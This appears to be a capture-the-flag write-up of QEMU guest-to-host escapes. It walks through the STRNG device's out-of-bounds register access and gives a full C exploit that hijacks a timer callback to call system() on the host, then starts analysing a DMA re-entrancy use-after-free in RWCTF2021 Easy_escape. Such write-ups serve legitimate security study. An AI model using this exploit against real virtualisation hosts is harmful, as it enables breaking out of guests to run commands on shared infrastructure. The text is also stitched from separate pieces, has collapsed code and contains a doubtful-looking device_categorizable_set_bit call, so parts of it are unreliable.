pwndbg> p *(STRNGState*)0x555558d0d870
$1 = {
pdev = {...},
mmio = {...},
pmio = {...},
addr = 0,
flag = 0,
regs = {0 <repeats 64 times>},
strng_timer = {
expire_time = -1,
timer_list = 0x5555574dedd0 ,
cb = 0x55555569ac8e <strng_timer >,
opaque = 0x555558d0d870 ,
next = 0x0 ,
scale = 1000000
}
}
pwndbg> telescope &((STRNGState*)0x555558d0d870)->regs 40
00:0000│ 0x555558d0e368 ◂— 0
... ↓ 31 skipped
20:0100│ 0x555558d0e468 ◂— 0xffffffffffffffff
21:0108│ 0x555558d0e470 —▸ 0x5555574dedd0 —▸ 0x555556475700 (qemu_clocks+32) —▸ 0x5555574df480 ◂— 0x555556475700 (qemu_clocks+32)
22:0110│ 0x555558d0e478 —▸ 0x55555569ac8e (strng_timer) ◂— push rbp
23:0118│ 0x555558d0e480 —▸ 0x555558d0d870 —▸ 0x5555574ba8d0 —▸ 0x555557451720 —▸ 0x5555574518a0 ◂— ...
24:0120│ 0x555558d0e488 ◂— 0
25:0128│ 0x555558d0e490 ◂— 0xf4240
26:0130│ 0x555558d0e498 ◂— 0
27:0138│ 0x555558d0e4a0 ◂— 0
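Suppose we wanted to escape by modifying main_loop_tlg. main_loop_tlg lives in the QEMU image, at an address below the heap, and the out-of-bounds write regs[opaque->addr >> 2] = val cannot use a negative index, so we need another approach.

pci_strng_realize initializes strng_timer; here QEMU_CLOCK_VIRTUAL = 1.

```c
timer_init_ms(&s->strng_timer, QEMU_CLOCK_VIRTUAL, strng_timer, s);
```

The call chain of this function is: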
pwndbg> bt
#0 timer_init_tl (ts =0x7fffffffd6a0, timer_list =0x5555558b107c <pci_set_word+36>, scale =32767, cb =0x555558d0f3a6, opaque =0xf90058d0f294) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :336
#1 0x000055555569ac4f in timer_init (ts =0x555558d0e468, type =QEMU_CLOCK_VIRTUAL, scale =1000000, cb =0x55555569ac8e <strng_timer>, opaque =0x555558d0d870) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/include/qemu/timer.h :442
#2 0x000055555569ac8b in timer_init_ms (ts =0x555558d0e468, type =QEMU_CLOCK_VIRTUAL, cb =0x55555569ac8e <strng_timer>, opaque =0x555558d0d870) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/include/qemu/timer.h :499
#3 0x000055555569afe2 in pci_strng_realize (pdev =0x555558d0d870, errp =0x7fffffffd708) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/hw/misc/strng.c :148
timer_init_tl sets expire_time to -1, so the cb function pointer is not called back yet.

```c
/* QEMU 2.8.1.1 layout: there is no attributes field yet, which matches
 * the gdb dump above (scale directly follows next). */
struct QEMUTimer {
    int64_t expire_time;
    QEMUTimerList *timer_list;
    QEMUTimerCB *cb;
    void *opaque;
    QEMUTimer *next;
    int scale;
};

void timer_init_tl(QEMUTimer *ts,
                   QEMUTimerList *timer_list, int scale,
                   QEMUTimerCB *cb, void *opaque)
{
    ts->timer_list = timer_list;
    ts->cb = cb;
    ts->opaque = opaque;
    ts->scale = scale;
    ts->expire_time = -1;
}
```
As the debug output above shows, STRNGState.flag starts at 0, but strng_mmio_write sets s->flag = 1 whenever index is neither 0 nor 1.

```c
static void strng_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    STRNGState *s = opaque;
    uint32_t seed = (uint32_t)val;

    if (size == 4 && ((addr & 3) == 0)) {
        uint32_t index = addr >> 2;
        if (index == 1) {
            s->regs[1] = rand();
        } else if (index != 0) {
            if (index == 3) {
                s->regs[3] = rand_r(&s->regs[2]);
            }
            s->flag = 1;
            s->regs[index] = seed;
        } else {
            srand((unsigned)val);
        }
    }
}
```

In strng_pmio_write, the generic register-write branch runs the following code, which arms the timer when opaque->flag is non-zero:

```c
s->regs[index] = (uint32_t)val;
if (s->flag) {
    int64_t now = qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL);
    timer_mod(&s->strng_timer, now + 100);
}
```
timer_mod has the following call stack:
pwndbg> bt
#0 timer_mod_ns_locked (timer_list =0x5555574dedd0, ts =0x55555755c7d8, expire_time =38581000000) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :388
#1 0x00005555559c4458 in timer_mod_ns (ts =0x55555755c7d8, expire_time =38581000000) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :424
#2 0x00005555559c455b in timer_mod (ts =0x55555755c7d8, expire_time =38581) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :458
#3 0x000055555569af88 in strng_pmio_write (opaque =0x55555755bbe0, addr =4, val =1465239272, size =4) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/hw/misc/strng.c :132
timer_mod_ns_locked is defined as follows. In other words, the timer's expire_time is set to now + 100 (in milliseconds; timer_mod multiplies it by the timer's scale to get nanoseconds, as the call stack shows), and opaque->strng_timer is added to the active timer list.

```c
static bool timer_mod_ns_locked(QEMUTimerList *timer_list,
                                QEMUTimer *ts, int64_t expire_time)
{
    QEMUTimer **pt, *t;

    /* Find the insertion point in the sorted list. */
    pt = &timer_list->active_timers;
    for (;;) {
        t = *pt;
        if (!timer_expired_ns(t, expire_time)) {
            break;
        }
        pt = &t->next;
    }
    ts->expire_time = MAX(expire_time, 0);
    ts->next = *pt;
    *pt = ts;

    return pt == &timer_list->active_timers;
}
```
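So a natural idea is to overwrite the cb of opaque->strng_timer with system@plt and point the timer's opaque field at the address of the command string, which gives arbitrary command execution. Note that after making these changes, timer_mod still has to be called to trigger the callback.

```c
ab_write(0x110, system_plt);                        /* strng_timer.cb */
ab_write(0x118, STRNGState_addr + 0xaf8 + 0x14);    /* strng_timer.opaque = &regs[5] */
mmio_write32(2 << 2, 0xdeadbeef);                   /* MMIO write to regs[2] sets flag = 1 */
pio_write32(0, 2 << 2);                             /* opaque->addr = 8, i.e. regs[2] */
pio_write32(1 << 2, 0xdeadbeef);                    /* data write with flag set calls timer_mod */
```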
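The helper `ab_write` is not defined in the snippet above. One plausible shape, given that the data port only moves 32 bits at a time, is a 64-bit write split into two address/data pairs. The sketch below is an assumption, not the author's code: it routes port writes through a function pointer (`ToyPorts`, an invented type) so it can run against a fake device, whereas a real guest exploit would call its own `pio_write32` wrapper around `outl()`. It also assumes a little-endian target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical port backend; in a guest this would wrap outl() on BAR1. */
typedef struct ToyPorts {
    void (*write32)(void *dev, uint32_t port_off, uint32_t val);
    void *dev;
} ToyPorts;

/* Write a 64-bit value at byte_off from regs as two 32-bit stores:
 * port 0 selects the address, port 4 carries the data. */
static void toy_ab_write64(const ToyPorts *p, uint32_t byte_off, uint64_t val)
{
    assert((byte_off & 3) == 0);        /* the device ignores unaligned addr */
    p->write32(p->dev, 0, byte_off);
    p->write32(p->dev, 4, (uint32_t)val);
    p->write32(p->dev, 0, byte_off + 4);
    p->write32(p->dev, 4, (uint32_t)(val >> 32));
}

/* Fake device used only to exercise the helper. */
typedef struct ToyDev {
    uint32_t addr;
    unsigned char mem[0x200];
} ToyDev;

static void toy_dev_write32(void *dev, uint32_t port_off, uint32_t val)
{
    ToyDev *d = dev;

    if (port_off == 0) {
        d->addr = val;
    } else if (port_off == 4 && (size_t)d->addr + 4 <= sizeof(d->mem)) {
        memcpy(d->mem + d->addr, &val, sizeof(val));
    }
}
```

On the real device the offsets 0, 4, and 12 from `regs` take the srand/rand/rand_r branches instead of a plain store, so a helper like this is only suitable for other offsets, such as the 0x110 and 0x118 used above.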
The call stack is:
pwndbg> bt
#0 __libc_system (line =0x555558d0e37c "/usr/bin/gnome-calculator") at ../sysdeps/posix/system.c :198
#1 0x00005555559c473d in timerlist_run_timers (timer_list =0x5555574dedd0) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :528
#2 0x00005555559c4786 in qemu_clock_run_timers (type =QEMU_CLOCK_VIRTUAL) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :539
#3 0x00005555559c4b1f in qemu_clock_run_all_timers () at /home/w0lfzhang/Desktop/qemu-2.8.1.1/qemu-timer.c :653
#4 0x00005555559c36c8 in main_loop_wait (nonblocking =0) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/main-loop.c :516
#5 0x000055555578a2ef in main_loop () at /home/w0lfzhang/Desktop/qemu-2.8.1.1/vl.c :1966
#6 0x0000555555791821 in main (argc =19, argv =0x7fffffffde98, envp =0x7fffffffdf38) at /home/w0lfzhang/Desktop/qemu-2.8.1.1/vl.c :4684
#7 0x00007ffff7a62083 in __libc_start_main (main =0x55555578d901 <main>, argc =19, argv =0x7fffffffde98, init =<optimized out>, fini =<optimized out>, rtld_fini =<optimized out>, stack_end =0x7fffffffde88) at ../csu/libc-start.c :308
#8 0x0000555555601a69 in _start ()
Full exploit

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/io.h>

/* ---- Port I/O helpers (BAR with IORESOURCE_IO) ---- */
#define IORESOURCE_IO 0x00000100ULL

typedef struct {
    uint16_t base;
    uint32_t size;
    uint16_t grant_base;
    uint32_t grant_len;
    bool have_ioperm;
    bool have_iopl;
    bool inited;
} pio_ctx_t;

static pio_ctx_t g_pio = {0};

/* Parse the sysfs "resource" file and pick an I/O BAR (bar_idx < 0: first one). */
static int parse_io_bar(const char *bdf_or_path, int bar_idx,
                        uint16_t *out_base, uint32_t *out_size)
{
    char path[256];
    if (strchr(bdf_or_path, '/')) {
        snprintf(path, sizeof(path), "%s", bdf_or_path);
    } else {
        snprintf(path, sizeof(path), "/sys/bus/pci/devices/%s/resource", bdf_or_path);
    }
    FILE *fp = fopen(path, "r");
    if (!fp) return -1;

    int idx = 0, chosen = -1;
    char line[256];
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long start = 0, end = 0, flags = 0;
        if (sscanf(line, "%llx %llx %llx", &start, &end, &flags) != 3) { idx++; continue; }
        if (bar_idx >= 0) {
            if (idx == bar_idx) {
                if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1; }
                if (end < start || start > 0xFFFFULL) { fclose(fp); errno = ERANGE; return -1; }
                *out_base = (uint16_t)start;
                *out_size = (uint32_t)(end - start + 1);
                chosen = idx;
                break;
            }
        } else {
            if (idx <= 5 && (flags & IORESOURCE_IO)) {
                if (end < start || start > 0xFFFFULL) { fclose(fp); errno = ERANGE; return -1; }
                *out_base = (uint16_t)start;
                *out_size = (uint32_t)(end - start + 1);
                chosen = idx;
                break;
            }
        }
        idx++;
    }
    fclose(fp);
    if (chosen < 0) { errno = ENOENT; return -1; }
    return 0;
}

/* Try ioperm() on the port range first, fall back to iopl(3). */
static int acquire_io_priv(uint16_t base, uint32_t size,
                           uint16_t *grant_base, uint32_t *grant_len,
                           bool *have_ioperm, bool *have_iopl)
{
    uint32_t len = size;
    if ((unsigned)base + len > 0x10000u) len = 0x10000u - base;
    if (len == 0) len = 1;
    if (ioperm(base, len, 1) == 0) {
        *grant_base = base; *grant_len = len;
        *have_ioperm = true; *have_iopl = false;
        return 0;
    }
    if (iopl(3) == 0) {
        *grant_base = 0; *grant_len = 0;
        *have_ioperm = false; *have_iopl = true;
        return 0;
    }
    return -1;
}

int pio_init(const char *bdf_or_path, int bar_idx)
{
    if (g_pio.inited) { errno = EALREADY; return -1; }
    uint16_t base = 0; uint32_t size = 0;
    if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0) return -1;
    uint16_t gbase = 0; uint32_t glen = 0;
    bool have_perm = false, have_iopl = false;
    if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0) return -1;
    g_pio.base = base;
    g_pio.size = size;
    g_pio.grant_base = gbase;
    g_pio.grant_len = glen;
    g_pio.have_ioperm = have_perm;
    g_pio.have_iopl = have_iopl;
    g_pio.inited = true;
    return 0;
}

void pio_fini(void)
{
    if (!g_pio.inited) return;
    if (g_pio.have_ioperm) (void)ioperm(g_pio.grant_base, g_pio.grant_len, 0);
    if (g_pio.have_iopl) (void)iopl(0);
    memset(&g_pio, 0, sizeof(g_pio));
}

uint16_t pio_base(void) { return g_pio.base; }
uint32_t pio_size(void) { return g_pio.size; }

/* Translate a BAR-relative offset into an absolute port number. */
static inline int pio_port(uint32_t off, int width, uint16_t *port_out)
{
    if (!g_pio.inited) { errno = EPERM; return -1; }
    if ((uint64_t)off + (uint64_t)width > g_pio.size) { errno = ERANGE; return -1; }
    uint32_t p = (uint32_t)g_pio.base + off;
    if (p > 0xFFFFu) { errno = ERANGE; return -1; }
    *port_out = (uint16_t)p;
    return 0;
}

uint8_t  pio_read8(uint32_t off)  { uint16_t p; if (pio_port(off, 1, &p)) return 0; return inb(p); }
uint16_t pio_read16(uint32_t off) { uint16_t p; if (pio_port(off, 2, &p)) return 0; return inw(p); }
uint32_t pio_read32(uint32_t off) { uint16_t p; if (pio_port(off, 4, &p)) return 0; return inl(p); }
void pio_write8(uint32_t off, uint8_t v)   { uint16_t p; if (pio_port(off, 1, &p)) return; outb(v, p); }
void pio_write16(uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off, 2, &p)) return; outw(v, p); }
void pio_write32(uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off, 4, &p)) return; outl(v, p); }

/* ---- MMIO helpers (BAR with IORESOURCE_MEM) ---- */
#define IORESOURCE_MEM 0x00000200ULL

typedef struct {
    volatile uint8_t *bar;
    size_t size;
    size_t map_len;
    int fd;
    int res_idx;
    bool inited;
} mmio_ctx_t;

static mmio_ctx_t g_mmio = {0};

/* Derive the "resource" text file path and the device directory. */
static int build_paths(const char *bdf_or_path,
                       char *resource_txt, size_t txt_sz,
                       char *dev_dir, size_t dir_sz)
{
    if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1; }
    if (strchr(bdf_or_path, '/')) {
        snprintf(resource_txt, txt_sz, "%s", bdf_or_path);
        snprintf(dev_dir, dir_sz, "%s", bdf_or_path);
        char *slash = strrchr(dev_dir, '/');
        if (!slash) { errno = EINVAL; return -1; }
        *slash = '\0';
    } else {
        snprintf(resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource", bdf_or_path);
        snprintf(dev_dir, dir_sz, "/sys/bus/pci/devices/%s", bdf_or_path);
    }
    return 0;
}

/* Pick a memory BAR from the resource file (bar_idx < 0: first one). */
static int parse_mem_bar(const char *resource_txt, int bar_idx,
                         unsigned long long *start, unsigned long long *end,
                         int *picked_idx)
{
    FILE *fp = fopen(resource_txt, "r");
    if (!fp) return -1;

    int idx = 0, sel = -1;
    char line[256];
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long s = 0, e = 0, f = 0;
        if (sscanf(line, "%llx %llx %llx", &s, &e, &f) != 3) { idx++; continue; }
        if (bar_idx >= 0) {
            if (idx == bar_idx) {
                if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1; }
                sel = idx; *start = s; *end = e;
                break;
            }
        } else {
            if (idx <= 5 && (f & IORESOURCE_MEM)) {
                if (e < s) { fclose(fp); errno = ERANGE; return -1; }
                sel = idx; *start = s; *end = e;
                break;
            }
        }
        idx++;
    }
    fclose(fp);
    if (sel < 0) { errno = ENOENT; return -1; }
    if (picked_idx) *picked_idx = sel;
    return 0;
}

/* Map the chosen memory BAR through sysfs resourceN. */
int mmio_init(const char *bdf_or_path, int bar_idx)
{
    if (g_mmio.inited) { errno = EALREADY; return -1; }

    char resource_txt[PATH_MAX];
    char dev_dir[PATH_MAX];
    if (build_paths(bdf_or_path, resource_txt, sizeof(resource_txt),
                    dev_dir, sizeof(dev_dir)) != 0) return -1;

    unsigned long long start = 0, end = 0;
    int res_idx = -1;
    if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &res_idx) != 0) return -1;

    size_t size = (size_t)((end - start) + 1ULL);
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    size_t map_len = (size + pg - 1) & ~(pg - 1);   /* round up to a page */

    char res_path[PATH_MAX];
    snprintf(res_path, sizeof(res_path), "%s/resource%d", dev_dir, res_idx);
    int fd = open(res_path, O_RDWR | O_SYNC);
    if (fd < 0) return -1;

    void *map = mmap(NULL, map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1; }

    g_mmio.bar = (volatile uint8_t *)map;
    g_mmio.size = size;
    g_mmio.map_len = map_len;
    g_mmio.fd = fd;
    g_mmio.res_idx = res_idx;
    g_mmio.inited = true;
    return 0;
}
```
void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void *mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off,1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); }uint16_t mmio_read16 (size_t off) { if (chk(off,2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); }uint32_t mmio_read32 (size_t off) { if (chk(off,4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); }uint64_t mmio_read64 (size_t off) { if (chk(off,8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); }void mmio_write8 (size_t off, uint8_t v) { if (chk(off,1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; }void mmio_write16 (size_t off, uint16_t v) { if (chk(off,2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; }void mmio_write32 (size_t off, uint32_t v) { if (chk(off,4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; }void mmio_write64 (size_t off, uint64_t v) { if (chk(off,8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; }volatile void *mmio_ptr (size_t off) { if (chk(off,1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } uint64_t ab_read (size_t off) { pio_write32(0 , off); uint64_t val_lo = pio_read32(4 ); pio_write32(0 , off + 4 ); uint64_t val_hi = pio_read32(4 ); return val_lo | val_hi << 32 ; } void ab_write (size_t off, uint64_t val) { pio_write32(0 , off); pio_write32(4 , val); pio_write32(0 , off + 4 ); pio_write32(4 , val >> 32 ); } int main () { pio_init("0000:00:04.0" , 1 ); mmio_init("0000:00:04.0" , 0 ); uint64_t qemu_base = ab_read(0x110 ) - 0x29ac8e ; printf ("[+] qemu base: %#llx\n" 
, qemu_base); uint64_t STRNGState_addr = ab_read(0x118 ); printf ("[+] STRNGState_addr: %#llx\n" , STRNGState_addr); const char cmd[] = "/usr/bin/gnome-calculator" ; for (int i = 0 ; i < sizeof (cmd); i += 8 ) { ab_write(i + 0x14 , *(uint64_t *)&cmd[i]); } size_t system_plt = qemu_base + 0x200D50 ; ab_write(0x110 , system_plt); ab_write(0x118 , STRNGState_addr + 0xaf8 + 0x14 ); mmio_write32(2 << 2 , 0xdeadbeef ); pio_write32(0 , 2 << 2 ); pio_write32(1 << 2 , 0xdeadbeef ); return 0 ; }
RWCTF2021 Easy_escape
Environment setup
sudo add-apt-repository -y universe
sudo apt update
sudo apt install -y libsnappy1v5 libusbredirparser1 libusbredirhost1
Vulnerability analysis
#include "qemu/osdep.h"
#include "qapi/error.h"
#include "qemu/module.h"
#include "hw/pci/pci.h"
#include "hw/pci/msi.h"
#include "exec/address-spaces.h"
#include "exec/memory.h"

#define TYPE_PCI_FUN "fun"
OBJECT_DECLARE_SIMPLE_TYPE(FunState, PCI_FUN)

typedef struct FunReq {
    uint32_t total_size;
    void *list[127];
} FunReq;

typedef struct FunState {
    PCIDevice parent_obj;
    MemoryRegion mmio;
    uint32_t addr;
    uint32_t size;
    uint32_t idx;
    uint32_t result_addr;
    FunReq *req;
    AddressSpace *as;
} FunState;

/* Writes a 4-byte status value to the guest physical address result_addr. */
static inline void put_result(FunState *s, uint32_t val)
{
    uint32_t res = val;
    address_space_write(s->as, (hwaddr)s->result_addr, MEMTXATTRS_UNSPECIFIED, &res, 4);
}

static FunReq *create_req(uint32_t size)
{
    if (size > 127 * 0x400 - 1) {
        return NULL;
    }
    FunReq *req = g_malloc(0x400);
    memset(req, 0, sizeof(FunReq));
    req->total_size = size;
    uint32_t t = req->total_size / 0x400 + 1;
    for (uint32_t i = 0; i < t && i < 127; i++) {
        req->list[i] = g_malloc(0x400);
    }
    return req;
}

static void delete_req(FunReq *req)
{
    uint32_t t = req->total_size / 0x400 + 1;
    for (uint32_t i = 0; i < t; i++) {
        g_free(req->list[i]);
    }
    g_free(req);
}

/* Guest memory -> req->list[val] */
static void handle_data_read(FunState *s, FunReq *req, uint32_t val)
{
    if (req->total_size && val <= 0x7E && val < (req->total_size / 0x400 + 1)) {
        put_result(s, 1);
        hwaddr pa = (hwaddr)(val * 0x400) + s->addr;
        address_space_read(s->as, pa, MEMTXATTRS_UNSPECIFIED, req->list[val], 0x400);
        put_result(s, 2);
    }
}

/* req->list[val] -> guest memory */
static void handle_data_write(FunState *s, FunReq *req, uint32_t val)
{
    if (req->total_size && val <= 0x7E && val < (req->total_size / 0x400 + 1)) {
        put_result(s, 1);
        hwaddr pa = (hwaddr)(val * 0x400) + s->addr;
        address_space_write(s->as, pa, MEMTXATTRS_UNSPECIFIED, req->list[val], 0x400);
        put_result(s, 2);
    }
}

static uint64_t fun_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    FunState *s = opaque;
    uint32_t val = (uint32_t)-1;
    switch (addr) {
    case 0x0:
        val = s->size;
        break;
    case 0x4:
        val = s->addr;
        break;
    case 0x8:
        val = s->result_addr;
        break;
    case 0xC:
        val = s->idx;
        break;
    case 0x10:
        if (s->req) {
            handle_data_write(s, s->req, s->idx);
        }
        break;
    default:
        break;
    }
    return val;
}

static void fun_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    FunState *s = opaque;
    switch (addr) {
    case 0x0:
        s->size = (uint32_t)val;
        break;
    case 0x4:
        s->addr = (uint32_t)val;
        break;
    case 0x8:
        s->result_addr = (uint32_t)val;
        break;
    case 0xC:
        s->idx = (uint32_t)val;
        break;
    case 0x10:
        if (s->req) {
            handle_data_read(s, s->req, s->idx);
        }
        break;
    case 0x14:
        if (!s->req) {
            s->req = create_req(s->size);
        }
        break;
    case 0x18:
        if (s->req) {
            delete_req(s->req);
        }
        s->req = NULL;
        s->size = 0;
        break;
    default:
        break;
    }
}

static const MemoryRegionOps fun_mmio_ops = {
    .read = fun_mmio_read,
    .write = fun_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

static void pci_fun_realize(PCIDevice *pdev, Error **errp)
{
    FunState *s = PCI_FUN(pdev);
    if (!msi_init(pdev, 0, 1, true, false, errp)) {
        s->addr = 0;
        s->size = 0;
        s->idx = 0;
        s->result_addr = 0;
        s->req = NULL;
        s->as = &address_space_memory;
        memory_region_init_io(&s->mmio, OBJECT(s), &fun_mmio_ops, s, "fun-mmio", 0x1000);
        pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
    }
}

static void pci_fun_uninit(PCIDevice *pdev)
{
    FunState *s = PCI_FUN(pdev);
    delete_req(s->req);
    s->addr = 0;
    s->size = 0;
    s->idx = 0;
    s->result_addr = 0;
    s->req = NULL;
    msi_uninit(pdev);
}

static void fun_class_init(ObjectClass *klass, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(klass);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(klass);
    k->realize = pci_fun_realize;
    k->exit = pci_fun_uninit;
    k->vendor_id = 0xCAFE;
    k->device_id = 0xBABE;
    k->revision = 0x10;
    k->class_id = PCI_CLASS_OTHERS;
    device_categorizable_set_bit(dc, DEVICE_CATEGORY_MISC);
}

static const TypeInfo fun_info = {
    .name = TYPE_PCI_FUN,
    .parent = TYPE_PCI_DEVICE,
    .instance_size = sizeof(FunState),
    .class_init = fun_class_init,
};

static void pci_fun_register_types(void)
{
    type_register_static(&fun_info);
}

type_init(pci_fun_register_types);
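The device's register offsets have the following meanings:
enum FUN_OPT {
    SIZE        = 0x00,
    ADDR        = 0x04,
    RESULT_ADDR = 0x08,
    INDEX       = 0x0C,
    HANDLE_DATA = 0x10,
    CREATE_REQ  = 0x14,
    DELETE_REQ  = 0x18
};
0x00 SIZE: sets size, the total request size later used by CREATE_REQ.
0x04 ADDR: DMA base address (a guest physical address); DMA accesses are offset from here in 0x400-byte blocks.
0x08 RESULT_ADDR: address the status result is written back to (a 4-byte DMA write).
0x0C INDEX: index of the chunk to operate on (0..126).
0x10 HANDLE_DATA:
An MMIO read triggers handle_data_write(): a DMA write (host → guest) that copies the 1 KB in req->list[IDX] to GPA = ADDR + IDX*0x400.
An MMIO write triggers handle_data_read(): a DMA read (guest → host) that copies 1 KB from the same GPA into req->list[IDX].
Both paths write 1 (started) and then 2 (finished) to RESULT_ADDR, so the guest can poll for completion.
0x14 CREATE_REQ: if req == NULL, allocates req plus (size / 0x400 + 1) chunks of 0x400 bytes each.
0x18 DELETE_REQ: if req != NULL, frees every chunk and req itself, then sets req = NULL and size = 0.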
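The chunk arithmetic shared by CREATE_REQ and HANDLE_DATA can be checked in isolation. The following is a standalone sketch, not QEMU code: the helper names `fun_chunk_count`, `fun_index_ok`, and `fun_chunk_gpa` are made up for illustration and simply mirror the expressions in the device source above.

```c
#include <stdbool.h>
#include <stdint.h>

#define FUN_CHUNK_SIZE 0x400u /* each req->list[i] buffer is 1 KB */
#define FUN_MAX_CHUNKS 127u   /* capacity of FunReq.list */

/* Number of chunks create_req() allocates for a given SIZE value. */
static uint32_t fun_chunk_count(uint32_t size)
{
    uint32_t t = size / FUN_CHUNK_SIZE + 1;
    return t < FUN_MAX_CHUNKS ? t : FUN_MAX_CHUNKS;
}

/* Mirror of the guard at the top of handle_data_read()/handle_data_write(). */
static bool fun_index_ok(uint32_t total_size, uint32_t idx)
{
    return total_size != 0 && idx <= 0x7E &&
           idx < total_size / FUN_CHUNK_SIZE + 1;
}

/* Guest physical address touched when operating on chunk idx. */
static uint64_t fun_chunk_gpa(uint32_t addr, uint32_t idx)
{
    return (uint64_t)(idx * FUN_CHUNK_SIZE) + addr;
}
```

For example, SIZE = 2 << 10 yields three chunks, and index 2 then maps to ADDR + 0x800. A SIZE of 0 still allocates one chunk, but the guard rejects every HANDLE_DATA access to it.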
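The bug in this challenge is DMA re-entrancy: the device's own DMA write can target its own MMIO region, which recursively re-enters the MMIO handlers and leads to a UAF / heap corruption.
The device's fun_mmio_write and fun_mmio_read can reach handle_data_read and handle_data_write respectively:
fun_mmio_write(0x10) → handle_data_read
fun_mmio_read(0x10) → handle_data_write
handle_data_read and handle_data_write do the following:
handle_data_read: copies 0x400 bytes from guest physical memory at ADDR + IDX*0x400 into req->list[IDX].
handle_data_write: copies the 0x400 bytes in req->list[IDX] to guest physical memory at ADDR + IDX*0x400.
Because a guest process can look up the physical address behind any of its own user-space pages, the 0x400 bytes of guest physical memory involved here are fully controlled and known to us.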
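The address lookup mentioned above relies on /proc/self/pagemap, which holds one 64-bit entry per virtual page. As a rough sketch of the decoding step only (the helper names `pagemap_offset` and `pagemap_entry_to_phys` are illustrative, and file I/O is left out), the bit layout can be handled like this:

```c
#include <stdint.h>

#define PM_PRESENT  (1ULL << 63)       /* page is present in RAM */
#define PM_SWAPPED  (1ULL << 62)       /* page is swapped out */
#define PM_PFN_MASK ((1ULL << 55) - 1) /* bits 0-54: page frame number */

/* Byte offset inside /proc/self/pagemap of the entry describing va. */
static uint64_t pagemap_offset(uint64_t va, uint64_t page_size)
{
    return (va / page_size) * sizeof(uint64_t);
}

/* Physical address for va, or 0 when the entry carries no usable PFN. */
static uint64_t pagemap_entry_to_phys(uint64_t entry, uint64_t va,
                                      uint64_t page_size)
{
    if (!(entry & PM_PRESENT) || (entry & PM_SWAPPED)) {
        return 0;
    }
    uint64_t pfn = entry & PM_PFN_MASK;
    return pfn * page_size + (va % page_size);
}
```

On recent kernels the PFN field reads as zero without CAP_SYS_ADMIN, so the exploit is expected to run as root inside the guest.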
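In addition, both handle_data_read and handle_data_write call put_result to report their execution status.
put_result writes to the physical address given by s->result_addr. That field is set through fun_mmio_write at offset 0x08 (RESULT_ADDR), and there is no range check on it.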
static inline void put_result(FunState *s, uint32_t val)
{
    uint32_t res = val;
    address_space_write(s->as, (hwaddr)s->result_addr, MEMTXATTRS_UNSPECIFIED, &res, 4);
}
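This means we can make the device write 4 bytes to an arbitrary guest physical address just before it reads or writes guest memory.
If we set s->result_addr beforehand to the physical address of the device's MMIO region plus 0x18, that write is dispatched to fun_mmio_write, which calls delete_req and frees the whole req: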
pwndbg> bt
#0 __GI___libc_free (mem=0x7fffa8e10550) at malloc.c :3087
#1 0x0000555555a25caa in delete_req (req=0x7fffa90dcc00) at ../hw/misc/fun.c :96
#2 0x0000555555a25ec9 in fun_mmio_write (opaque=0x5555576a0390, addr=24, val=1, size=4) at ../hw/misc/fun.c :162
#3 0x0000555555c08105 in memory_region_write_accessor (mr=0x5555576a0c80, addr=24, value=0x7ffff504b9f8, size=4, shift=0, mask=4294967295, attrs=...) at ../softmmu/memory.c :491
